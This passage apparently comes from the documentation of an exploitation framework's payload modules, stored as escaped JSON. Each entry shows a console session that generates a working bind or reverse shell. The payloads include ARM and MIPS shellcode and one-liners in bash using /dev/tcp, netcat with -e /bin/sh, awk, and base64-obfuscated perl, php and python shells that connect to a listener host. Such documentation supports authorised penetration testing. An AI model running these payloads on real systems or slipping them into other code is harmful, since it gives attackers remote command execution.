\"\\x10\\xa0\\xe1\\x66\\x00\\x90\\xef\\x08\\xd0\\x8d\\xe2\\x06\\x00\\xa0\\xe1\"\n \"\\x01\\x10\\x41\\xe0\\x02\\x20\\x42\\xe0\\x07\\x00\\x2d\\xe9\\x05\\x00\\xa0\"\n \"\\xe3\\x0d\\x10\\xa0\\xe1\\x66\\x00\\x90\\xef\\x0c\\xd0\\x8d\\xe2\\x00\\x60\"\n \"\\xa0\\xe1\\x02\\x10\\xa0\\xe3\\x06\\x00\\xa0\\xe1\\x3f\\x00\\x90\\xef\\x01\"\n \"\\x10\\x51\\xe2\\xfb\\xff\\xff\\x5a\\x04\\x10\\x4d\\xe2\\x02\\x20\\x42\\xe0\"\n \"\\x2f\\x30\\xa0\\xe3\\x62\\x70\\xa0\\xe3\\x07\\x34\\x83\\xe0\\x69\\x70\\xa0\"\n \"\\xe3\\x07\\x38\\x83\\xe0\\x6e\\x70\\xa0\\xe3\\x07\\x3c\\x83\\xe0\\x2f\\x40\"\n \"\\xa0\\xe3\\x73\\x70\\xa0\\xe3\\x07\\x44\\x84\\xe0\\x68\\x70\\xa0\\xe3\\x07\"\n \"\\x48\\x84\\xe0\\x73\\x50\\xa0\\xe3\\x68\\x70\\xa0\\xe3\\x07\\x54\\x85\\xe0\"\n \"\\x3e\\x00\\x2d\\xe9\\x08\\x00\\x8d\\xe2\\x00\\x10\\x8d\\xe2\\x04\\x20\\x8d\"\n \"\\xe2\\x0b\\x00\\x90\\xef\"\n)\n```\n" }, { "path": "docs/modules/payloads/armle/reverse_tcp.md", "content": "## Description\n\nModule generates payload that creates interactive tcp reverse shell for ARMLE architecture.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use payloads/armle/reverse_tcp`\n 3. Do: `set lhost 192.168.1.4`\n 4. Do: `set lport 4321`\n 5. Module generates armle reverse shell tcp payload\n\n## Scenarios\n\n```\nrsf >\nrsf > use payloads/armle/reverse_tcp\nrsf (ARMLE Reverse TCP) > set lhost 192.168.1.4\n[+] lhost => 192.168.1.4\nrsf (ARMLE Reverse TCP) > set lport 4321\n[+] lport => 4321\nrsf (ARMLE Reverse TCP) > run\n[*] Running module...\n[*] Generating payload\n[+] Building payload for python\npayload = (\n \"\\x01\\x10\\x8f\\xe2\\x11\\xff\\x2f\\xe1\\x02\\x20\\x01\\x21\\x92\\x1a\\x0f\"\n \"\\x02\\x19\\x37\\x01\\xdf\\x06\\x1c\\x08\\xa1\\x10\\x22\\x02\\x37\\x01\\xdf\"\n \"\\x3f\\x27\\x02\\x21\\x30\\x1c\\x01\\xdf\\x01\\x39\\xfb\\xd5\\x05\\xa0\\x92\"\n \"\\x1a\\x05\\xb4\\x69\\x46\\x0b\\x27\\x01\\xdf\\xc0\\x46\\x02\\x00\\x10\\xe1\"\n \"\\xc0\\xa8\\x01\\x04\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x00\"\n)\n```\n" }, { "path": "docs/modules/payloads/cmd/awk_bind_tcp.md", "content": "## Description\n\nModule generates payload that creates interactive tcp bind shell by using awk one-liner. \n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use payloads/cmd/awk_bind_tcp`\n 3. Do: `set rport 4321`\n 4. Do: `run`\n 5. Module generates awk tcp bind shell payload.\n\n## Scenarios\n\n```\nrsf > use payloads/cmd/awk_bind_tcp\nrsf (Awk Bind TCP) > set rport 4321\n[+] rport => 4321\nrsf (Awk Bind TCP) > run\n[*] Running module...\n[*] Generating payload\nawk 'BEGIN{s=\"/inet/tcp/4321/0/0\";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'\n```\n" }, { "path": "docs/modules/payloads/cmd/awk_bind_udp.md", "content": "## Description\n\nModule generates payload that creates interactive udp bind shell by using awk. \n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use payloads/cmd/awk_bind_tcp`\n 3. Do: `set rport 4321`\n 4. Do: `run`\n 5. Module generates awk udp bind shell payload\n\n## Scenarios\n\n```\nrsf > use payloads/cmd/awk_bind_udp\nrsf (Awk Bind UDP) > set rport 4321\n[+] rport => 4321\nrsf (Awk Bind UDP) > run\n[*] Running module...\n[*] Generating payload\nawk 'BEGIN{s=\"/inet/udp/4321/0/0\";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'\n```\n" }, { "path": "docs/modules/payloads/cmd/awk_reverse_tcp.md", "content": "## Description\n\nModule generates payload that creates interactive tcp reverse shell by using awk one-liner. \n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use payloads/cmd/awk_reverse_tcp`\n 3. Do: `set lhost 192.168.1.3`\n 4. Do: `set lport 4321`\n 5. Do: `run`\n 6. Module generates awk tcp reverse shell payload\n\n## Scenarios\n\n```\nrsf > use payloads/cmd/awk_reverse_tcp\nrsf (Awk Reverse TCP) > set lhost 192.168.1.4\n[+] lhost => 192.168.1.4\nrsf (Awk Reverse TCP) > set lport 4321\n[+] lport => 4321\nrsf (Awk Reverse TCP) > run\n[*] Running module...\n[*] Generating payload\nawk 'BEGIN{s=\"/inet/tcp/0/192.168.1.4/4321\";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)};'\n```\n" }, { "path": "docs/modules/payloads/cmd/bash_reverse_tcp.md", "content": "## Description\n\nModule generates payload that creates interactive tcp reverse shell by using bash one-liner. \n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use payloads/cmd/bash_reverse_tcp`\n 3. Do: `set lhost 192.168.1.4`\n 4. Do: `set lport 4321`\n 5. Do: `run`\n 6. Module generates bash tcp reverse shell payload\n\n## Scenarios\n\n```\nrsf > use payloads/cmd/bash_reverse_tcp\nrsf (Bash Reverse TCP) > set lhost 192.168.1.4\n[+] lhost => 192.168.1.4\nrsf (Bash Reverse TCP) > set lport 4321\n[+] lport => 4321\nrsf (Bash Reverse TCP) > run\n[*] Running module...\n[*] Generating payload\nbash -i >& /dev/tcp/192.168.1.4/4321 0>&1\n```\n" }, { "path": "docs/modules/payloads/cmd/netcat_bind_tcp.md", "content": "## Description\n\nModule generates payload that creates interactive tcp bind shell by using netcat one-liner. \n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use payloads/cmd/netcat_bind_tcp`\n 3. Do: `set rport 4321`\n 4. Do: `run`\n 5. Module generates netcat tcp bind shell payload.\n\n## Scenarios\n\n```\nrsf > use payloads/cmd/netcat_bind_tcp\nrsf (Netcat Bind TCP) > set rport 4321\n[+] rport => 4321\nrsf (Netcat Bind TCP) > run\n[*] Running module...\n[*] Generating payload\nnc -lvp 4321 -e /bin/sh\n```\n" }, { "path": "docs/modules/payloads/cmd/netcat_reverse_tcp.md", "content": "## Description\n\nModule generates payload that creates interactive tcp reverse shell by using netcat one-liner. \n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use payloads/cmd/netcat_reverse_tcp`\n 3. Do: `set lhost 192.168.1.4`\n 4. Do: `set lport 4321`\n 5. Do: `run`\n 6. Module generates netcat tcp reverse shell payload\n\n## Scenarios\n\n```\nrsf > use payloads/cmd/netcat_reverse_tcp\nrsf (Netcat Reverse TCP) > set lhost 192.168.1.4\n[+] lhost => 192.168.1.4\nrsf (Netcat Reverse TCP) > set lport 4321\n[+] lport => 4321\nrsf (Netcat Reverse TCP) > run\n[*] Running module...\n[*] Generating payload\nnc 192.168.1.4 4321 -e /bin/sh\n```\n" }, { "path": "docs/modules/payloads/cmd/perl_bind_tcp.md", "content": "## Description\n\nModule generates payload that creates interactive tcp bind shell by using perl one-liner. \n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use payloads/cmd/perl_bind_udp`\n 3. Do: `set rport 4321`\n 4. Do: `run`\n 5. Module generates perl tcp bind shell payload.\n\n## Scenarios\n\n```\nrsf > use payloads/cmd/perl_bind_tcp\nrsf (Perl Bind TCP One-Liner) > set rport 4321\n[+] rport => 4321\nrsf (Perl Bind TCP One-Liner) > run\n[*] Running module...\n[*] Generating payload\nperl -MIO -e \"use MIME::Base64;eval(decode_base64('dXNlIElPO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKExvY2FsUG9ydCw0MzIxLFJldXNlLDEsTGlzdGVuKS0+YWNjZXB0OyR+LT5mZG9wZW4oJGMsdyk7U1RESU4tPmZkb3BlbigkYyxyKTt3aGlsZSg8Pil7aWYoJF89fiAvKC4qKS8pe3N5c3RlbSAkMTt9fTs='));\"\n```\n" }, { "path": "docs/modules/payloads/cmd/perl_reverse_tcp.md", "content": "## Description\n\nModule generates payload that creates interactive tcp reverse shell by using perl one-liner. \n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use payloads/cmd/perl_reverse_tcp`\n 3. Do: `set lhost 192.168.1.3`\n 4. Do: `set lport 4321`\n 5. Do: `run`\n 6. Module generates perl tcp reverse shell payload\n\n## Scenarios\n\n```\nrsf > use payloads/cmd/perl_reverse_tcp\nrsf (Perl Reverse TCP One-Liner) > set lhost 192.168.1.3\n[+] lhost => 192.168.1.3\nrsf (Perl Reverse TCP One-Liner) > set lport 4321\n[+] lport => 4321\nrsf (Perl Reverse TCP One-Liner) > run\n[*] Running module...\n[*] Generating payload\nperl -MIO -e \"use MIME::Base64;eval(decode_base64('dXNlIElPO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKFBlZXJBZGRyLCIxOTIuMTY4LjEuMzo0MzIxIik7U1RESU4tPmZkb3BlbigkYyxyKTskfi0+ZmRvcGVuKCRjLHcpO3doaWxlKDw+KXtpZigkXz1+IC8oLiopLyl7c3lzdGVtICQxO319Ow=='));\"\n```\n" }, { "path": "docs/modules/payloads/cmd/php_bind_tcp.md", "content": "## Description\n\nModule generates payload that creates interactive tcp bind shell by using php one-liner. \n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use payloads/cmd/php_bind_tcp`\n 3. Do: `set rport 4321`\n 4. Do: `run`\n 5. Module generates php tcp bind shell payload\n\n## Scenarios\n\n```\nrsf > use payloads/cmd/php_bind_tcp\nrsf (PHP Bind TCP One-Liner) > set rport 4321\n[+] rport => 4321\nrsf (PHP Bind TCP One-Liner) > run\n[*] Running module...\n[*] Generating payload\nphp -r \"eval(base64_decode('JHM9c29ja2V0X2NyZWF0ZShBRl9JTkVULFNPQ0tfU1RSRUFNLFNPTF9UQ1ApO3NvY2tldF9iaW5kKCRzLCIwLjAuMC4wIiw0MzIxKTtzb2NrZXRfbGlzdGVuKCRzLDEpOyRjbD1zb2NrZXRfYWNjZXB0KCRzKTt3aGlsZSgxKXtpZighc29ja2V0X3dyaXRlKCRjbCwiJCAiLDIpKWV4aXQ7JGluPXNvY2tldF9yZWFkKCRjbCwxMDApOyRjbWQ9cG9wZW4oIiRpbiIsInIiKTt3aGlsZSghZmVvZigkY21kKSl7JG09ZmdldGMoJGNtZCk7c29ja2V0X3dyaXRlKCRjbCwkbSxzdHJsZW4oJG0pKTt9fQ=='));\"\n```\n" }, { "path": "docs/modules/payloads/cmd/php_reverse_tcp.md", "content": "## Description\n\nModule generates payload that creates interactive tcp reverse shell by using php one-liner. \n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use payloads/cmd/php_reverse_tcp`\n 3. Do: `set lhost 192.168.1.4`\n 4. Do: `set lport 4321`\n 5. Do: `run`\n 6. Module generates php tcp reverse shell payload\n\n## Scenarios\n\n```\nrsf > use payloads/cmd/php_reverse_tcp\nrsf (PHP Reverse TCP One-Liner) > set lhost 192.168.1.4\n[+] lhost => 192.168.1.4\nrsf (PHP Reverse TCP One-Liner) > set lport 4321\n[+] lport => 4321\nrsf (PHP Reverse TCP One-Liner) > run\n[*] Running module...\n[*] Generating payload\nphp -r \"eval(base64_decode('JHM9ZnNvY2tvcGVuKCJ0Y3A6Ly8xOTIuMTY4LjEuNCIsNDMyMSk7d2hpbGUoIWZlb2YoJHMpKXtleGVjKGZnZXRzKCRzKSwkbyk7JG89aW1wbG9kZSgiXG4iLCRvKTskby49IlxuIjtmcHV0cygkcywkbyk7fQ=='));\"\n```\n" }, { "path": "docs/modules/payloads/cmd/python_bind_tcp.md", "content": "## Description\n\nModule generates payload that creates interactive tcp bind shell by using python one-liner. \n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use payloads/cmd/python_bind_tcp`\n 3. Do: `set rport 4321`\n 4. Do: `run`\n 5. Module generates python tcp bind shell payload\n\n## Scenarios\n\n```\nrsf > use payloads/cmd/python_bind_tcp\nrsf (Python Reverse TCP One-Liner) > set rport 4321\n[+] rport => 4321\nrsf (Python Reverse TCP One-Liner) > run\n[*] Running module...\n[*] Generating payload\npython -c \"exec('aW1wb3J0IHNvY2tldCxvcwpzbz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkKc28uYmluZCgoJzAuMC4wLjAnLDQzMjEpKQpzby5saXN0ZW4oMSkKc28sYWRkcj1zby5hY2NlcHQoKQp4PUZhbHNlCndoaWxlIG5vdCB4OgoJZGF0YT1zby5yZWN2KDEwMjQpCglzdGRpbixzdGRvdXQsc3RkZXJyLD1vcy5wb3BlbjMoZGF0YSkKCXN0ZG91dF92YWx1ZT1zdGRvdXQucmVhZCgpK3N0ZGVyci5yZWFkKCkKCXNvLnNlbmQoc3Rkb3V0X3ZhbHVlKQo='.decode('base64'))\"\n```\n" }, { "path": "docs/modules/payloads/cmd/python_bind_udp.md", "content": "## Description\n\nModule generates payload that creates interactive udp bind shell by using python one-liner. \n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use payloads/cmd/python_bind_udp`\n 3. Do: `set rport 4321`\n 4. Do: `run`\n 5. Module generates python udp bind shell payload\n\n## Scenarios\n\n```\nrsf > use payloads/cmd/python_bind_udp\nrsf (Python Bind UDP One-Liner) > set rport 4321\n[+] rport => 4321\nrsf (Python Bind UDP One-Liner) > run\n[*] Running module...\n[*] Generating payload\npython -c \"exec('ZnJvbSBzdWJwcm9jZXNzIGltcG9ydCBQb3BlbixQSVBFCmZyb20gc29ja2V0IGltcG9ydCBzb2NrZXQsIEFGX0lORVQsIFNPQ0tfREdSQU0Kcz1zb2NrZXQoQUZfSU5FVCxTT0NLX0RHUkFNKQpzLmJpbmQoKCcwLjAuMC4wJyw0MzIxKSkKd2hpbGUgMToKCWRhdGEsYWRkcj1zLnJlY3Zmcm9tKDEwMjQpCglvdXQ9UG9wZW4oZGF0YSxzaGVsbD1UcnVlLHN0ZG91dD1QSVBFLHN0ZGVycj1QSVBFKS5jb21tdW5pY2F0ZSgpCglzLnNlbmR0bygnJy5qb2luKFtvdXRbMF0sb3V0WzFdXSksYWRkcikK'.decode('base64'))\"\n```\n" }, { "path": "docs/modules/payloads/cmd/python_reverse_tcp.md", "content": "## Description\n\nModule generates payload that creates interactive tcp reverse shell by using python one-liner. \n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use payloads/cmd/python_reverse_tcp`\n 3. Do: `set lhost 192.168.1.4`\n 4. Do: `set lport 4321`\n 5. Do: `run`\n 6. Module generates python udp reverse shell payload\n\n## Scenarios\n\n```\nrsf > use payloads/cmd/python_reverse_tcp\nrsf (Python Reverse TCP One-Liner) > set lhost 192.168.1.4\n[+] lhost => 192.168.1.4\nrsf (Python Reverse TCP One-Liner) > set lport 4321\n[+] lport => 4321\nrsf (Python Reverse TCP One-Liner) > run\n[*] Running module...\n[*] Generating payload\npython -c \"exec('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zCnM9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pCnMuY29ubmVjdCgoJzE5Mi4xNjguMS40Jyw0MzIxKSkKb3MuZHVwMihzLmZpbGVubygpLDApCm9zLmR1cDIocy5maWxlbm8oKSwxKQpvcy5kdXAyKHMuZmlsZW5vKCksMikKcD1zdWJwcm9jZXNzLmNhbGwoWyIvYmluL3NoIiwiLWkiXSk='.decode('base64'))\"\n```\n" }, { "path": "docs/modules/payloads/cmd/python_reverse_udp.md", "content": "## Description\n\nModule generates payload that creates interactive udp reverse shell by using python one-liner. \n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use payloads/cmd/python_reverse_udp`\n 3. Do: `set lhost 192.168.1.4`\n 4. Do: `set lport 4321`\n 5. Do: `run`\n 6. Module generates python udp reverse shell payload\n\n## Scenarios\n\n```\nrsf > use payloads/cmd/python_reverse_udp\nrsf (Python Reverse UDP One-Liner) > set lhost 192.168.1.4\n[+] lhost => 192.168.1.4\nrsf (Python Reverse UDP One-Liner) > set lport 4321\n[+] lport => 4321\nrsf (Python Reverse UDP One-Liner) > run\n[*] Running module...\n[*] Generating payload\npython -c \"exec('aW1wb3J0IG9zCmltcG9ydCBwdHkKaW1wb3J0IHNvY2tldApzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsIHNvY2tldC5TT0NLX0RHUkFNKQpzLmNvbm5lY3QoKCcxOTIuMTY4LjEuNCcsNDMyMSkpCm9zLmR1cDIocy5maWxlbm8oKSwgMCkKb3MuZHVwMihzLmZpbGVubygpLCAxKQpvcy5kdXAyKHMuZmlsZW5vKCksIDIpCnB0eS5zcGF3bignL2Jpbi9zaCcpOwpzLmNsb3NlKCkK'.decode('base64'))\"\n```\n" }, { "path": "docs/modules/payloads/mipsbe/bind_tcp.md", "content": "## Description\n\nModule generates payload that creates interactive tcp bind shell for MIPSBE architecture.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use payloads/mipsbe/bind_tcp`\n 3. Do: `set rport 4321`\n 4. Do: `run`\n 5. Module generates mipsbe bind shell tcp payload\n\n## Scenarios\n\n```\nrsf > use payloads/mipsbe/bind_tcp\nrsf (MIPSBE Bind TCP) > set rport 4321\n[+] rport => 4321\nrsf (MIPSBE Bind TCP) > run\n[*] Running module...\n[*] Generating payload\n[+] Building payload for python\npayload = (\n \"\\x27\\xbd\\xff\\xe0\\x24\\x0e\\xff\\xfd\\x01\\xc0\\x20\\x27\\x01\\xc0\\x28\"\n \"\\x27\\x28\\x06\\xff\\xff\\x24\\x02\\x10\\x57\\x01\\x01\\x01\\x0c\\x30\\x50\"\n \"\\xff\\xff\\x24\\x0e\\xff\\xef\\x01\\xc0\\x70\\x27\\x24\\x0d\\xff\\xfd\\x01\"\n \"\\xa0\\x68\\x27\\x01\\xcd\\x68\\x04\\x24\\x0e\\x10\\xe1\\x01\\xae\\x68\\x25\"\n \"\\xaf\\xad\\xff\\xe0\\xaf\\xa0\\xff\\xe4\\xaf\\xa0\\xff\\xe8\\xaf\\xa0\\xff\"\n \"\\xec\\x02\\x10\\x20\\x25\\x24\\x0e\\xff\\xef\\x01\\xc0\\x30\\x27\\x23\\xa5\"\n \"\\xff\\xe0\\x24\\x02\\x10\\x49\\x01\\x01\\x01\\x0c\\x02\\x10\\x20\\x25\\x24\"\n \"\\x05\\x01\\x01\\x24\\x02\\x10\\x4e\\x01\\x01\\x01\\x0c\\x02\\x10\\x20\\x25\"\n \"\\x28\\x05\\xff\\xff\\x28\\x06\\xff\\xff\\x24\\x02\\x10\\x48\\x01\\x01\\x01\"\n \"\\x0c\\xaf\\xa2\\xff\\xff\\x24\\x11\\xff\\xfd\\x02\\x20\\x88\\x27\\x8f\\xa4\"\n \"\\xff\\xff\\x02\\x20\\x28\\x21\\x24\\x02\\x0f\\xdf\\x01\\x01\\x01\\x0c\\x24\"\n \"\\x10\\xff\\xff\\x22\\x31\\xff\\xff\\x16\\x30\\xff\\xfa\\x28\\x06\\xff\\xff\"\n \"\\x3c\\x0f\\x2f\\x2f\\x35\\xef\\x62\\x69\\xaf\\xaf\\xff\\xec\\x3c\\x0e\\x6e\"\n \"\\x2f\\x35\\xce\\x73\\x68\\xaf\\xae\\xff\\xf0\\xaf\\xa0\\xff\\xf4\\x27\\xa4\"\n \"\\xff\\xec\\xaf\\xa4\\xff\\xf8\\xaf\\xa0\\xff\\xfc\\x27\\xa5\\xff\\xf8\\x24\"\n \"\\x02\\x0f\\xab\\x01\\x01\\x01\\x0c\"\n)\n```\n" }, { "path": "docs/modules/payloads/mipsbe/reverse_tcp.md", "content": "## Description\n\nModule generates payload that creates interactive tcp reverse shell for MIPSBE architecture.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use payloads/mipsbe/reverse_tcp`\n 3. Do: `set lhost 192.168.1.4`\n 4. Do: `set lport 4321`\n 5. Module generates mipsbe reverse shell tcp payload\n\n## Scenarios\n\n```\nrsf > use payloads/mipsbe/reverse_tcp\nrsf (MIPSBE Reverse TCP) > set lhost 192.168.1.4\n[+] lhost => 192.168.1.4\nrsf (MIPSBE Reverse TCP) > set lport 4321\n[+] lport => 4321\nrsf (MIPSBE Reverse TCP) > run\n[*] Running module...\n[*] Generating payload\n[+] Building payload for python\npayload = (\n \"\\x28\\x04\\xff\\xff\\x24\\x02\\x0f\\xa6\\x01\\x09\\x09\\x0c\\x28\\x04\\x11\"\n \"\\x11\\x24\\x02\\x0f\\xa6\\x01\\x09\\x09\\x0c\\x24\\x0c\\xff\\xfd\\x01\\x80\"\n \"\\x20\\x27\\x24\\x02\\x0f\\xa6\\x01\\x09\\x09\\x0c\\x24\\x0c\\xff\\xfd\\x01\"\n \"\\x80\\x20\\x27\\x01\\x80\\x28\\x27\\x28\\x06\\xff\\xff\\x24\\x02\\x10\\x57\"\n \"\\x01\\x09\\x09\\x0c\\x30\\x44\\xff\\xff\\x24\\x02\\x0f\\xc9\\x01\\x09\\x09\"\n \"\\x0c\\x24\\x02\\x0f\\xc9\\x01\\x09\\x09\\x0c\\x3c\\x05\\x00\\x02\\x34\\xa5\"\n \"\\x10\\xe1\\xaf\\xa5\\xff\\xf8\\x3c\\x05\\xc0\\xa8\\x34\\xa5\\x01\\x04\\xaf\"\n \"\\xa5\\xff\\xfc\\x23\\xa5\\xff\\xf8\\x24\\x0c\\xff\\xef\\x01\\x80\\x30\\x27\"\n \"\\x24\\x02\\x10\\x4a\\x01\\x09\\x09\\x0c\\x3c\\x08\\x2f\\x2f\\x35\\x08\\x62\"\n \"\\x69\\xaf\\xa8\\xff\\xec\\x3c\\x08\\x6e\\x2f\\x35\\x08\\x73\\x68\\xaf\\xa8\"\n \"\\xff\\xf0\\x28\\x07\\xff\\xff\\xaf\\xa7\\xff\\xf4\\xaf\\xa7\\xff\\xfc\\x23\"\n \"\\xa4\\xff\\xec\\x23\\xa8\\xff\\xec\\xaf\\xa8\\xff\\xf8\\x23\\xa5\\xff\\xf8\"\n \"\\x27\\xbd\\xff\\xec\\x28\\x06\\xff\\xff\\x24\\x02\\x0f\\xab\\x00\\x90\\x93\"\n \"\\x4c\"\n)\n```\n" }, { "path": "docs/modules/payloads/mipsle/bind_tcp.md", "content": "## Description\n\nModule generates payload that creates interactive tcp bind shell for MIPSLE architecture.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use payloads/mipsle/bind_tcp`\n 3. Do: `set rport 4321`\n 4. Do: `run`\n 5. Module generates mipsle bind shell tcp payload\n\n## Scenarios\n\n```\nrsf > use payloads/mipsle/bind_tcp\nrsf (MIPSLE Bind TCP) > set rport 4321\n[+] rport => 4321\nrsf (MIPSLE Bind TCP) > run\n[*] Running module...\n[*] Generating payload\n[+] Building payload for python\npayload = (\n \"\\xe0\\xff\\xbd\\x27\\xfd\\xff\\x0e\\x24\\x27\\x20\\xc0\\x01\\x27\\x28\\xc0\"\n \"\\x01\\xff\\xff\\x06\\x28\\x57\\x10\\x02\\x24\\x0c\\x01\\x01\\x01\\xff\\xff\"\n \"\\x50\\x30\\xef\\xff\\x0e\\x24\\x27\\x70\\xc0\\x01\\x10\\xe1\\x0d\\x24\\x04\"\n \"\\x68\\xcd\\x01\\xfd\\xff\\x0e\\x24\\x27\\x70\\xc0\\x01\\x25\\x68\\xae\\x01\"\n \"\\xe0\\xff\\xad\\xaf\\xe4\\xff\\xa0\\xaf\\xe8\\xff\\xa0\\xaf\\xec\\xff\\xa0\"\n \"\\xaf\\x25\\x20\\x10\\x02\\xef\\xff\\x0e\\x24\\x27\\x30\\xc0\\x01\\xe0\\xff\"\n \"\\xa5\\x23\\x49\\x10\\x02\\x24\\x0c\\x01\\x01\\x01\\x25\\x20\\x10\\x02\\x01\"\n \"\\x01\\x05\\x24\\x4e\\x10\\x02\\x24\\x0c\\x01\\x01\\x01\\x25\\x20\\x10\\x02\"\n \"\\xff\\xff\\x05\\x28\\xff\\xff\\x06\\x28\\x48\\x10\\x02\\x24\\x0c\\x01\\x01\"\n \"\\x01\\xff\\xff\\xa2\\xaf\\xfd\\xff\\x11\\x24\\x27\\x88\\x20\\x02\\xff\\xff\"\n \"\\xa4\\x8f\\x21\\x28\\x20\\x02\\xdf\\x0f\\x02\\x24\\x0c\\x01\\x01\\x01\\xff\"\n \"\\xff\\x10\\x24\\xff\\xff\\x31\\x22\\xfa\\xff\\x30\\x16\\xff\\xff\\x06\\x28\"\n \"\\x62\\x69\\x0f\\x3c\\x2f\\x2f\\xef\\x35\\xec\\xff\\xaf\\xaf\\x73\\x68\\x0e\"\n \"\\x3c\\x6e\\x2f\\xce\\x35\\xf0\\xff\\xae\\xaf\\xf4\\xff\\xa0\\xaf\\xec\\xff\"\n \"\\xa4\\x27\\xf8\\xff\\xa4\\xaf\\xfc\\xff\\xa0\\xaf\\xf8\\xff\\xa5\\x27\\xab\"\n \"\\x0f\\x02\\x24\\x0c\\x01\\x01\\x01\"\n)\n```\n" }, { "path": "docs/modules/payloads/mipsle/reverse_tcp.md", "content": "## Description\n\nModule generates payload that creates interactive tcp reverse shell for MIPSLE architecture.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use payloads/mipsle/reverse_tcp`\n 3. Do: `set lhost 192.168.1.4`\n 4. Do: `set lport 4321`\n 5. Module generates mipsle reverse shell tcp payload\n\n## Scenarios\n\n```\nrsf > use payloads/mipsle/reverse_tcp\nrsf (MIPSLE Reverse TCP) > set lhost 192.168.1.4\n[+] lhost => 192.168.1.4\nrsf (MIPSLE Reverse TCP) > set lport 4321\n[+] lport => 4321\nrsf (MIPSLE Reverse TCP) > run\n[*] Running module...\n[*] Generating payload\n[+] Building payload for python\npayload = (\n \"\\xff\\xff\\x04\\x28\\xa6\\x0f\\x02\\x24\\x0c\\x09\\x09\\x01\\x11\\x11\\x04\"\n \"\\x28\\xa6\\x0f\\x02\\x24\\x0c\\x09\\x09\\x01\\xfd\\xff\\x0c\\x24\\x27\\x20\"\n \"\\x80\\x01\\xa6\\x0f\\x02\\x24\\x0c\\x09\\x09\\x01\\xfd\\xff\\x0c\\x24\\x27\"\n \"\\x20\\x80\\x01\\x27\\x28\\x80\\x01\\xff\\xff\\x06\\x28\\x57\\x10\\x02\\x24\"\n \"\\x0c\\x09\\x09\\x01\\xff\\xff\\x44\\x30\\xc9\\x0f\\x02\\x24\\x0c\\x09\\x09\"\n \"\\x01\\xc9\\x0f\\x02\\x24\\x0c\\x09\\x09\\x01\\x10\\xe1\\x05\\x3c\\x02\\x00\"\n \"\\xa5\\x34\\xf8\\xff\\xa5\\xaf\\x01\\x04\\x05\\x3c\\xc0\\xa8\\xa5\\x34\\xfc\"\n \"\\xff\\xa5\\xaf\\xf8\\xff\\xa5\\x23\\xef\\xff\\x0c\\x24\\x27\\x30\\x80\\x01\"\n \"\\x4a\\x10\\x02\\x24\\x0c\\x09\\x09\\x01\\x62\\x69\\x08\\x3c\\x2f\\x2f\\x08\"\n \"\\x35\\xec\\xff\\xa8\\xaf\\x73\\x68\\x08\\x3c\\x6e\\x2f\\x08\\x35\\xf0\\xff\"\n \"\\xa8\\xaf\\xff\\xff\\x07\\x28\\xf4\\xff\\xa7\\xaf\\xfc\\xff\\xa7\\xaf\\xec\"\n \"\\xff\\xa4\\x23\\xec\\xff\\xa8\\x23\\xf8\\xff\\xa8\\xaf\\xf8\\xff\\xa5\\x23\"\n \"\\xec\\xff\\xbd\\x27\\xff\\xff\\x06\\x28\\xab\\x0f\\x02\\x24\\x0c\\x09\\x09\"\n \"\\x01\"\n)\n```\n" }, { "path": "docs/modules/payloads/perl/bind_tcp.md", "content": "## Description\n\nModule generates payload that creates interactive tcp bind shell by using perl. \n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use payloads/perl/bind_tcp`\n 3. Do: `set rport 4321`\n 4. Do: `run`\n 5. Module generates perl tcp bind shell payload\n\n## Scenarios\n\n```\nrsf > use payloads/perl/bind_tcp\nrsf (Perl Bind TCP) > set rport 4321\n[+] rport => 4321\nrsf (Perl Bind TCP) > run\n[*] Running module...\n[*] Generating payload\nuse MIME::Base64;eval(decode_base64('dXNlIElPO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKExvY2FsUG9ydCw0MzIxLFJldXNlLDEsTGlzdGVuKS0+YWNjZXB0OyR+LT5mZG9wZW4oJGMsdyk7U1RESU4tPmZkb3BlbigkYyxyKTt3aGlsZSg8Pil7aWYoJF89fiAvKC4qKS8pe3N5c3RlbSAkMTt9fTs='));\n```\n" }, { "path": "docs/modules/payloads/perl/reverse_tcp.md", "content": "## Description\n\nModule generates payload that creates interactive tcp 